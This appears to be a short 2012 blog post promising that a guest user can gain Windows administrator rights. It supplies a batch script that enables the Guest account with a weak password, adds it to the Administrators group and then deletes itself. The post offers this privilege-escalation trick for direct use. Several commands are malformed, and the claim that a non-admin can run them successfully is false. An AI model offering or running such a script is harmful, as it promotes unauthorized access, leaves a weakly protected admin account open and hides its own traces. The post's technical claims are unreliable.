Friday 13 July 2012

How to get Admin privileges for guest ?

Sometime we are on comuter which dont have ADMIN power of computer !!

so what to do when you need it?

TRY THIS

Want admin privileges on ur pc??????????????????
try THIS

Copy and paste the code given below in notepad

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

and save it as anyname.bat(not txt)
then double click on it
This will add u in administrators group!!!

No comments:

Post a Comment